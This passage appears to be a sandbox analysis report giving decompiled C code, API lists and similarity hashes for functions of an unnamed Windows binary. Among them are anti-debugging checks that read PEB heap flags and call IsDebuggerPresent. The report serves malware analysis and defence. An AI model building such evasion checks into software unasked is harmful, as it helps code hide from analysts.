                                                                                                                                                      				void* _t34;
                                                                                                                                                      
                                                                                                                                                      				_t27 = __esi;
                                                                                                                                                      				_t26 = __edi;
                                                                                                                                                      				_t25 = __edx;
                                                                                                                                                      				_t22 = __ecx;
                                                                                                                                                      				_t21 = __ebx;
                                                                                                                                                      				_t6 = __eax;
                                                                                                                                                      				_t34 = _t22 -  *0x103322d8; // 0x4c242c18
                                                                                                                                                      				if(_t34 == 0) {
                                                                                                                                                      					asm("repe ret");
                                                                                                                                                      				}
                                                                                                                                                      				 *0x10333a58 = _t6;
                                                                                                                                                      				 *0x10333a54 = _t22;
                                                                                                                                                      				 *0x10333a50 = _t25;
                                                                                                                                                      				 *0x10333a4c = _t21;
                                                                                                                                                      				 *0x10333a48 = _t27;
                                                                                                                                                      				 *0x10333a44 = _t26;
                                                                                                                                                      				 *0x10333a70 = ss;
                                                                                                                                                      				 *0x10333a64 = cs;
                                                                                                                                                      				 *0x10333a40 = ds;
                                                                                                                                                      				 *0x10333a3c = es;
                                                                                                                                                      				 *0x10333a38 = fs;
                                                                                                                                                      				 *0x10333a34 = gs;
                                                                                                                                                      				asm("pushfd");
                                                                                                                                                      				_pop( *0x10333a68);
                                                                                                                                                      				 *0x10333a5c =  *_t31;
                                                                                                                                                      				 *0x10333a60 = _v0;
                                                                                                                                                      				 *0x10333a6c =  &_a4;
                                                                                                                                                      				 *0x103339a8 = 0x10001;
                                                                                                                                                      				_t11 =  *0x10333a60; // 0x0
                                                                                                                                                      				 *0x1033395c = _t11;
                                                                                                                                                      				 *0x10333950 = 0xc0000409;
                                                                                                                                                      				 *0x10333954 = 1;
                                                                                                                                                      				_t12 =  *0x103322d8; // 0x4c242c18
                                                                                                                                                      				_v812 = _t12;
                                                                                                                                                      				_t13 =  *0x103322dc; // 0xb3dbd3e7
                                                                                                                                                      				_v808 = _t13;
                                                                                                                                                      				 *0x103339a0 = IsDebuggerPresent();
                                                                                                                                                      				_push(1);
                                                                                                                                                      				E10013A5E(_t14);
                                                                                                                                                      				SetUnhandledExceptionFilter(0);
                                                                                                                                                      				_t17 = UnhandledExceptionFilter(0x10023b34);
                                                                                                                                                      				if( *0x103339a0 == 0) {
                                                                                                                                                      					_push(1);
                                                                                                                                                      					E10013A5E(_t17);
                                                                                                                                                      				}
                                                                                                                                                      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                      			}




















                                                                                                                                                      APIs
                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 100161C5
                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100161DA
                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(10023B34), ref: 100161E5
                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 10016201
                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 10016208
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2579439406-0
                                                                                                                                                      • Opcode ID: 469b891285ebbef8cb1b1fd3885dfcaa8d07e7beac247f7a81ea467a82630b0a
                                                                                                                                                      • Instruction ID: 7a4982afc0af0121ee83e1bbc930dedb521e4c826244c77e9c1cc9287b5788a2
                                                                                                                                                      • Opcode Fuzzy Hash: 469b891285ebbef8cb1b1fd3885dfcaa8d07e7beac247f7a81ea467a82630b0a
                                                                                                                                                      • Instruction Fuzzy Hash: 0A21CCB4901264EFE700DF29DCC86447BA8FB88311F50D11AE98D8AB62E7B499C5CF02
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 50%
                                                                                                                                                      			E10019780(void* __ebx, void* __esi, intOrPtr _a4, char _a8, intOrPtr _a36, intOrPtr* _a40, intOrPtr* _a44) {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				char _v12;
                                                                                                                                                      				void* _t45;
                                                                                                                                                      
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				__imp__SetupDiGetDeviceRegistryPropertyA(_a4,  &_a8, _a36,  &_v12, 0, 0, _a44);
                                                                                                                                                      				if(GetLastError() == 0x7a) {
                                                                                                                                                      					 *_a40 = L1000CE56(__ebx, _a44, _t45, __esi,  *_a44);
                                                                                                                                                      					E1000CF20(_t45,  *_a40, 0,  *_a44);
                                                                                                                                                      					__imp__SetupDiGetDeviceRegistryPropertyA(_a4,  &_a8, _a36,  &_v12,  *_a40,  *_a44, 0);
                                                                                                                                                      					_v8 = 1;
                                                                                                                                                      				}
                                                                                                                                                      				return _v8;
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                      • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,?,00000000,00000000,00000000,?), ref: 100197AC
                                                                                                                                                      • GetLastError.KERNEL32 ref: 100197B2
                                                                                                                                                      • _memset.LIBCMT ref: 100197DE
                                                                                                                                                      • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000000,00000000,?,?,00000000), ref: 10019804
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DevicePropertyRegistrySetup$ErrorLast_memset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 895502402-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                      			E00401000() {
                                                                                                                                                      				void* _v152;
                                                                                                                                                      				struct _OSVERSIONINFOA _v156;
                                                                                                                                                      				int _t13;
                                                                                                                                                      
                                                                                                                                                      				memset( &_v156, 0, 0x27 << 2);
                                                                                                                                                      				_v156.dwOSVersionInfoSize = 0x9c;
                                                                                                                                                      				_t13 = GetVersionExA( &_v156);
                                                                                                                                                      				if(_t13 != 0) {
                                                                                                                                                      					L4:
                                                                                                                                                      					asm("sbb eax, eax");
                                                                                                                                                      					return _t13 + 1;
                                                                                                                                                      				} else {
                                                                                                                                                      					_v156.dwOSVersionInfoSize = 0x9c;
                                                                                                                                                      					_t13 = GetVersionExA( &_v156);
                                                                                                                                                      					if(_t13 != 0) {
                                                                                                                                                      						goto L4;
                                                                                                                                                      					} else {
                                                                                                                                                      						_v156.dwOSVersionInfoSize = 0x94;
                                                                                                                                                      						_t13 = GetVersionExA( &_v156);
                                                                                                                                                      						if(_t13 != 0) {
                                                                                                                                                      							goto L4;
                                                                                                                                                      						} else {
                                                                                                                                                      							return _t13;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                      • GetVersionExA.KERNEL32(?), ref: 00401029
                                                                                                                                                      • GetVersionExA.KERNEL32(?), ref: 00401038
                                                                                                                                                      • GetVersionExA.KERNEL32(?), ref: 0040104B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Version
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1889659487-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 37%
                                                                                                                                                      			E10015376(void* __eax, void* __ebx, void* __edx) {
                                                                                                                                                      				_Unknown_base(*)()* _t8;
                                                                                                                                                      
                                                                                                                                                      				 *((intOrPtr*)(__edx + __ebx - 1)) =  *((intOrPtr*)(__edx + __ebx - 1)) + __edx;
                                                                                                                                                      				_t8 = SetUnhandledExceptionFilter(E10013034());
                                                                                                                                                      				 *0x10333948 = 0;
                                                                                                                                                      				return _t8;
                                                                                                                                                      			}





                                                                                                                                                      APIs
                                                                                                                                                      • __decode_pointer.LIBCMT ref: 10015384
                                                                                                                                                        • Part of subcall function 10013034: TlsGetValue.KERNEL32(?,100133C2,00000000,00000000,1000EAC9,00000000,?,?,00000001,?,?,1000EB2D,00000001,?,?,10330240), ref: 10013041
                                                                                                                                                        • Part of subcall function 10013034: TlsGetValue.KERNEL32(00000005,?,100133C2,00000000,00000000,1000EAC9,00000000,?,?,00000001,?,?,1000EB2D,00000001), ref: 10013058
                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001538B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Value$ExceptionFilterUnhandled__decode_pointer
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1958600898-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E10019E10() {
                                                                                                                                                      				long _v8;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      
                                                                                                                                                      				_v16 = 0;
                                                                                                                                                      				_v8 = GetVersion();
                                                                                                                                                      				_v12 = _v8 & 0xff;
                                                                                                                                                      				if(_v12 != 5) {
                                                                                                                                                      					_v16 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x18)) + 0x40));
                                                                                                                                                      				} else {
                                                                                                                                                      					_v16 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x18)) + 0xc));
                                                                                                                                                      				}
                                                                                                                                                      				return 0 | _v16 != 0x00000002;
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Version
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1889659487-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E10019E70() {
                                                                                                                                                      				long _v8;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      
                                                                                                                                                      				_v16 = 0;
                                                                                                                                                      				_v8 = GetVersion();
                                                                                                                                                      				_v12 = _v8 & 0xff;
                                                                                                                                                      				if(_v12 != 5) {
                                                                                                                                                      					_v16 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x18)) + 0x44));
                                                                                                                                                      				} else {
                                                                                                                                                      					_v16 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x18)) + 0x10));
                                                                                                                                                      				}
                                                                                                                                                      				return 0 | _v16 != 0x00000000;
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Version
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1889659487-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00403660(void* _a4) {
                                                                                                                                                      				long _v4;
                                                                                                                                                      				void _v8;
                                                                                                                                                      
                                                                                                                                                      				_v4 = 0;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				DeviceIoControl(_a4, 0x222040, 0, 0,  &_v8, 4,  &_v4, 0);
                                                                                                                                                      				return _v8;
                                                                                                                                                      			}






                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ControlDevice
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2352790924-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001A010() {
                                                                                                                                                      
                                                                                                                                                      				return IsDebuggerPresent();
                                                                                                                                                      			}




                                                                                                                                                      APIs
                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,1001A029,?,?,1001A0C0), ref: 1001A013
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebuggerPresent
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1347740429-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 70%
                                                                                                                                                      			E100060F0() {
                                                                                                                                                      				signed int __ebx;
                                                                                                                                                      				signed int __edi;
                                                                                                                                                      				signed int __esi;
                                                                                                                                                      				signed int _t366;
                                                                                                                                                      				signed int _t367;
                                                                                                                                                      				signed int _t375;
                                                                                                                                                      				signed int _t377;
                                                                                                                                                      				signed int _t378;
                                                                                                                                                      				signed int _t380;
                                                                                                                                                      				signed int _t383;
                                                                                                                                                      				signed int _t385;
                                                                                                                                                      				signed int _t386;
                                                                                                                                                      				signed int _t387;
                                                                                                                                                      				signed int _t391;
                                                                                                                                                      				signed int _t394;
                                                                                                                                                      				signed int _t398;
                                                                                                                                                      				signed int _t401;
                                                                                                                                                      				unsigned int _t403;
                                                                                                                                                      				signed int _t404;
                                                                                                                                                      				intOrPtr _t405;
                                                                                                                                                      				signed int _t406;
                                                                                                                                                      				signed int _t407;
                                                                                                                                                      				void* _t408;
                                                                                                                                                      				signed int _t409;
                                                                                                                                                      				signed char _t412;
                                                                                                                                                      				signed int _t413;
                                                                                                                                                      				void* _t414;
                                                                                                                                                      				signed char _t417;
                                                                                                                                                      				unsigned int _t419;
                                                                                                                                                      				signed int _t421;
                                                                                                                                                      				signed int _t422;
                                                                                                                                                      				signed int _t424;
                                                                                                                                                      				signed int _t425;
                                                                                                                                                      				signed int _t446;
                                                                                                                                                      				intOrPtr* _t447;
                                                                                                                                                      				void* _t453;
                                                                                                                                                      				signed int* _t456;
                                                                                                                                                      				signed int _t459;
                                                                                                                                                      				signed char _t460;
                                                                                                                                                      				signed int _t464;
                                                                                                                                                      				signed int _t470;
                                                                                                                                                      				signed int _t473;
                                                                                                                                                      				intOrPtr _t480;
                                                                                                                                                      				intOrPtr _t481;
                                                                                                                                                      				signed int _t482;
                                                                                                                                                      				signed int _t484;
                                                                                                                                                      				signed char _t489;
                                                                                                                                                      				signed int _t493;
                                                                                                                                                      				signed char _t503;
                                                                                                                                                      				char _t504;
                                                                                                                                                      				signed int _t508;
                                                                                                                                                      				signed int _t510;
                                                                                                                                                      				signed int _t511;
                                                                                                                                                      				signed char _t533;
                                                                                                                                                      				intOrPtr _t534;
                                                                                                                                                      				signed int _t540;
                                                                                                                                                      				signed int _t541;
                                                                                                                                                      				intOrPtr _t542;
                                                                                                                                                      				signed char _t545;
                                                                                                                                                      				intOrPtr _t559;
                                                                                                                                                      				signed int _t565;
                                                                                                                                                      				signed int _t566;
                                                                                                                                                      				signed int _t568;
                                                                                                                                                      				intOrPtr* _t584;
                                                                                                                                                      				signed int _t585;
                                                                                                                                                      				signed int _t586;
                                                                                                                                                      				signed int _t589;
                                                                                                                                                      				signed int _t591;
                                                                                                                                                      				intOrPtr _t595;
                                                                                                                                                      				intOrPtr* _t599;
                                                                                                                                                      				intOrPtr _t606;
                                                                                                                                                      				void* _t607;
                                                                                                                                                      				void* _t608;
                                                                                                                                                      				void* _t609;
                                                                                                                                                      
                                                                                                                                                      				_t454 =  *((intOrPtr*)(_t607 + 0xa8));
                                                                                                                                                      				_t606 =  *((intOrPtr*)(_t607 + 0xa8));
                                                                                                                                                      				_t560 =  *((intOrPtr*)(_t607 + 0xa8));
                                                                                                                                                      				 *((intOrPtr*)(_t607 + 0x60)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t607 + 0x64)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t607 + 0x68)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t607 + 0x6c)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t607 + 0x58)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t607 + 0x5c)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t607 + 0x54)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t607 + 0x50)) = 0;
                                                                                                                                                      				_t366 = E100049A0( *((intOrPtr*)(_t607 + 0xa8)), _t607 + 0x14);
                                                                                                                                                      				if(_t366 != 0) {
                                                                                                                                                      					L159:
                                                                                                                                                      					return _t366;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t367 =  *(_t607 + 0x14);
                                                                                                                                                      					if(_t367 != 2 ||  *(_t607 + 0x18) != 0) {
                                                                                                                                                      						L11:
                                                                                                                                                      						__eflags = _t367 - 3;
                                                                                                                                                      						if(_t367 != 3) {
                                                                                                                                                      							L17:
                                                                                                                                                      							__eflags = _t367 - 4;
                                                                                                                                                      							if(_t367 != 4) {
                                                                                                                                                      								L22:
                                                                                                                                                      								_t464 =  *(_t607 + 0x18);
                                                                                                                                                      								__eflags = _t367 | _t464;
                                                                                                                                                      								if((_t367 | _t464) != 0) {
                                                                                                                                                      									__eflags = _t367 - 5;
                                                                                                                                                      									if(_t367 != 5) {
                                                                                                                                                      										L158:
                                                                                                                                                      										return 0x10;
                                                                                                                                                      									}
                                                                                                                                                      									__eflags = _t464;
                                                                                                                                                      									if(_t464 != 0) {
                                                                                                                                                      										goto L158;
                                                                                                                                                      									}
                                                                                                                                                      									 *(_t607 + 0x20) = 0;
                                                                                                                                                      									 *((intOrPtr*)(_t607 + 0x24)) = 0;
                                                                                                                                                      									 *((intOrPtr*)(_t607 + 0x30)) = 0;
                                                                                                                                                      									 *((intOrPtr*)(_t607 + 0x4c)) = 0;
                                                                                                                                                      									_t366 = E10004AC0( *(_t607 + 0xb4), _t607 + 0x20);
                                                                                                                                                      									__eflags = _t366;
                                                                                                                                                      									if(_t366 != 0) {
                                                                                                                                                      										goto L159;
                                                                                                                                                      									} else {
                                                                                                                                                      										_t456 =  *(_t607 + 0xb4);
                                                                                                                                                      										 *(_t606 + 0x40) =  *(_t607 + 0x20);
                                                                                                                                                      										_t366 = E100049A0(_t456, _t607 + 0x14);
                                                                                                                                                      										__eflags = _t366;
                                                                                                                                                      										if(_t366 != 0) {
                                                                                                                                                      											goto L159;
                                                                                                                                                      										} else {
                                                                                                                                                      											while(1) {
                                                                                                                                                      												L29:
                                                                                                                                                      												__eflags =  *(_t607 + 0x14) |  *(_t607 + 0x18);
                                                                                                                                                      												if(( *(_t607 + 0x14) |  *(_t607 + 0x18)) == 0) {
                                                                                                                                                      													break;
                                                                                                                                                      												}
                                                                                                                                                      												_t366 = E100049A0(_t456, _t607 + 0x34);
                                                                                                                                                      												__eflags = _t366;
                                                                                                                                                      												if(_t366 != 0) {
                                                                                                                                                      													goto L159;
                                                                                                                                                      												} else {
                                                                                                                                                      													_t425 = _t456[1];
                                                                                                                                                      													__eflags =  *(_t607 + 0x38);
                                                                                                                                                      													if(__eflags > 0) {
                                                                                                                                                      														goto L158;
                                                                                                                                                      													}
                                                                                                                                                      													_t595 =  *((intOrPtr*)(_t607 + 0x34));
                                                                                                                                                      													if(__eflags >= 0) {
                                                                                                                                                      														__eflags = _t595 - _t425;
                                                                                                                                                      														if(_t595 > _t425) {
                                                                                                                                                      															goto L158;
                                                                                                                                                      														}
                                                                                                                                                      													}
                                                                                                                                                      													__eflags =  *(_t607 + 0x18);
                                                                                                                                                      													if( *(_t607 + 0x18) > 0) {
                                                                                                                                                      														L70:
                                                                                                                                                      														 *_t456 =  *_t456 + _t595;
                                                                                                                                                      														__eflags =  *_t456;
                                                                                                                                                      														_t456[1] = _t425 - _t595;
                                                                                                                                                      														goto L71;
                                                                                                                                                      													} else {
                                                                                                                                                      														_t510 =  *(_t607 + 0x14);
                                                                                                                                                      														__eflags = _t510 - 0x100;
                                                                                                                                                      														if(_t510 >= 0x100) {
                                                                                                                                                      															goto L70;
                                                                                                                                                      														} else {
                                                                                                                                                      															_t511 = _t510 + 0xfffffff2;
                                                                                                                                                      															__eflags = _t511 - 7;
                                                                                                                                                      															if(__eflags > 0) {
                                                                                                                                                      																goto L70;
                                                                                                                                                      															} else {
                                                                                                                                                      																switch( *((intOrPtr*)(_t511 * 4 +  &M10006B54))) {
                                                                                                                                                      																	case 0:
                                                                                                                                                      																		__edi =  *(__esp + 0x20);
                                                                                                                                                      																		__esi = __esp + 0x30;
                                                                                                                                                      																		__eax = __edi;
                                                                                                                                                      																		__ecx = __ebx;
                                                                                                                                                      																		__eax = E10004C00(__edi, __ebx, __esi);
                                                                                                                                                      																		__eflags = __eax;
                                                                                                                                                      																		if(__eax != 0) {
                                                                                                                                                      																			goto L159;
                                                                                                                                                      																		} else {
                                                                                                                                                      																			__ecx =  *(__esp + 0x30);
                                                                                                                                                      																			__eax = __edi;
                                                                                                                                                      																			 *(__esp + 0x24) = E10004C20(__edi,  *(__esp + 0x30));
                                                                                                                                                      																			 *(__esp + 0x4c) = 0;
                                                                                                                                                      																			goto L71;
                                                                                                                                                      																		}
                                                                                                                                                      																		goto L161;
                                                                                                                                                      																	case 1:
                                                                                                                                                      																		__eax =  *(__esp + 0x24);
                                                                                                                                                      																		__esi = __esp + 0x4c;
                                                                                                                                                      																		__ecx = __ebx;
                                                                                                                                                      																		__eax = E10004C00( *(__esp + 0x24), __ebx, __esi);
                                                                                                                                                      																		__eflags = __eax;
                                                                                                                                                      																		if(__eax != 0) {
                                                                                                                                                      																			goto L159;
                                                                                                                                                      																		} else {
                                                                                                                                                      																			goto L71;
                                                                                                                                                      																		}
                                                                                                                                                      																		goto L161;
                                                                                                                                                      																	case 2:
                                                                                                                                                      																		goto L70;
                                                                                                                                                      																	case 3:
                                                                                                                                                      																		__eflags = _t425;
                                                                                                                                                      																		if(_t425 == 0) {
                                                                                                                                                      																			goto L158;
                                                                                                                                                      																		}
                                                                                                                                                      																		_t456[1] = _t425 + 0xffffffff;
                                                                                                                                                      																		_t429 =  *_t456;
                                                                                                                                                      																		_t512 =  *_t429;
                                                                                                                                                      																		_t430 = _t429 + 1;
                                                                                                                                                      																		__eflags = _t512;
                                                                                                                                                      																		 *((char*)(_t607 + 0x13)) = _t512;
                                                                                                                                                      																		 *_t456 = _t430;
                                                                                                                                                      																		if(_t512 != 0) {
                                                                                                                                                      																			_t366 = E10004AC0( *(_t607 + 0xb4), _t607 + 0x44);
                                                                                                                                                      																			__eflags = _t366;
                                                                                                                                                      																			if(_t366 != 0) {
                                                                                                                                                      																				goto L159;
                                                                                                                                                      																			} else {
                                                                                                                                                      																				_t513 =  *(_t607 + 0x44);
                                                                                                                                                      																				__eflags = _t513 -  *((intOrPtr*)( *((intOrPtr*)(_t607 + 0xc0))));
                                                                                                                                                      																				if(_t513 >=  *((intOrPtr*)( *((intOrPtr*)(_t607 + 0xc0))))) {
                                                                                                                                                      																					goto L158;
                                                                                                                                                      																				}
                                                                                                                                                      																				_t433 =  *((intOrPtr*)(_t607 + 0xbc));
                                                                                                                                                      																				_t574 =  *(_t433 + _t513 * 8);
                                                                                                                                                      																				_t456 =  *(_t607 + 0xb4);
                                                                                                                                                      																				 *(_t607 + 0x1c) =  *(_t433 + 4 + _t513 * 8);
                                                                                                                                                      																				goto L44;
                                                                                                                                                      																			}
                                                                                                                                                      																		} else {
                                                                                                                                                      																			 *(_t607 + 0x1c) = _t595 + 0xffffffff;
                                                                                                                                                      																			_t574 = _t430;
                                                                                                                                                      																			L44:
                                                                                                                                                      																			__eflags =  *(_t607 + 0x1c) & 0x00000001;
                                                                                                                                                      																			if(( *(_t607 + 0x1c) & 0x00000001) != 0) {
                                                                                                                                                      																				goto L158;
                                                                                                                                                      																			}
                                                                                                                                                      																			_t597 =  *((intOrPtr*)(_t607 + 0xc4));
                                                                                                                                                      																			_push(4 +  *(_t607 + 0x20) * 4);
                                                                                                                                                      																			_push(_t597);
                                                                                                                                                      																			_t435 =  *((intOrPtr*)( *_t597))();
                                                                                                                                                      																			_t610 = _t607 + 8;
                                                                                                                                                      																			__eflags = _t435;
                                                                                                                                                      																			 *(_t606 + 0x74) = _t435;
                                                                                                                                                      																			if(_t435 == 0) {
                                                                                                                                                      																				L160:
                                                                                                                                                      																				return 2;
                                                                                                                                                      																			} else {
                                                                                                                                                      																				_t552 =  *(_t610 + 0x1c);
                                                                                                                                                      																				__eflags = _t552;
                                                                                                                                                      																				if(_t552 != 0) {
                                                                                                                                                      																					_push(_t552);
                                                                                                                                                      																					_push(_t597);
                                                                                                                                                      																					_t436 =  *((intOrPtr*)( *_t597))();
                                                                                                                                                      																					_t611 = _t610 + 8;
                                                                                                                                                      																					__eflags = _t436;
                                                                                                                                                      																					 *(_t606 + 0x78) = _t436;
                                                                                                                                                      																					if(_t436 == 0) {
                                                                                                                                                      																						goto L160;
                                                                                                                                                      																					} else {
                                                                                                                                                      																						E1000D190(_t456, _t574, _t597, _t436, _t574,  *((intOrPtr*)(_t611 + 0x1c)));
                                                                                                                                                      																						_t552 =  *(_t611 + 0x28);
                                                                                                                                                      																						_t607 = _t611 + 0xc;
                                                                                                                                                      																						goto L50;
                                                                                                                                                      																					}
                                                                                                                                                      																				} else {
                                                                                                                                                      																					_t606 = 0;
                                                                                                                                                      																					L50:
                                                                                                                                                      																					_t366 = E10005F30( *(_t607 + 0x20),  *(_t606 + 0x74),  *(_t606 + 0x78), _t552);
                                                                                                                                                      																					__eflags = _t366;
                                                                                                                                                      																					if(_t366 != 0) {
                                                                                                                                                      																						goto L159;
                                                                                                                                                      																					} else {
                                                                                                                                                      																						__eflags =  *((intOrPtr*)(_t607 + 0x13)) - _t366;
                                                                                                                                                      																						if( *((intOrPtr*)(_t607 + 0x13)) == _t366) {
                                                                                                                                                      																							_t439 =  *(_t607 + 0x1c);
                                                                                                                                                      																							_t456[1] = _t456[1] - _t439;
                                                                                                                                                      																							 *_t456 =  *_t456 + _t439;
                                                                                                                                                      																						}
                                                                                                                                                      																						goto L71;
                                                                                                                                                      																					}
                                                                                                                                                      																				}
                                                                                                                                                      																			}
                                                                                                                                                      																		}
                                                                                                                                                      																		goto L161;
                                                                                                                                                      																	case 4:
                                                                                                                                                      																		__edx =  *(__esp + 0xc4);
                                                                                                                                                      																		__eax =  *(__esp + 0xc0);
                                                                                                                                                      																		__ecx =  *( *(__esp + 0xc0));
                                                                                                                                                      																		_push( *(__esp + 0xc4));
                                                                                                                                                      																		_push(__ecx);
                                                                                                                                                      																		_t136 = __ebp + 0x64; // 0x64
                                                                                                                                                      																		__ecx = _t136;
                                                                                                                                                      																		goto L67;
                                                                                                                                                      																	case 5:
                                                                                                                                                      																		__edx =  *(__esp + 0xc4);
                                                                                                                                                      																		__eax =  *(__esp + 0xc0);
                                                                                                                                                      																		__ecx =  *( *(__esp + 0xc0));
                                                                                                                                                      																		_push( *(__esp + 0xc4));
                                                                                                                                                      																		_push(__ecx);
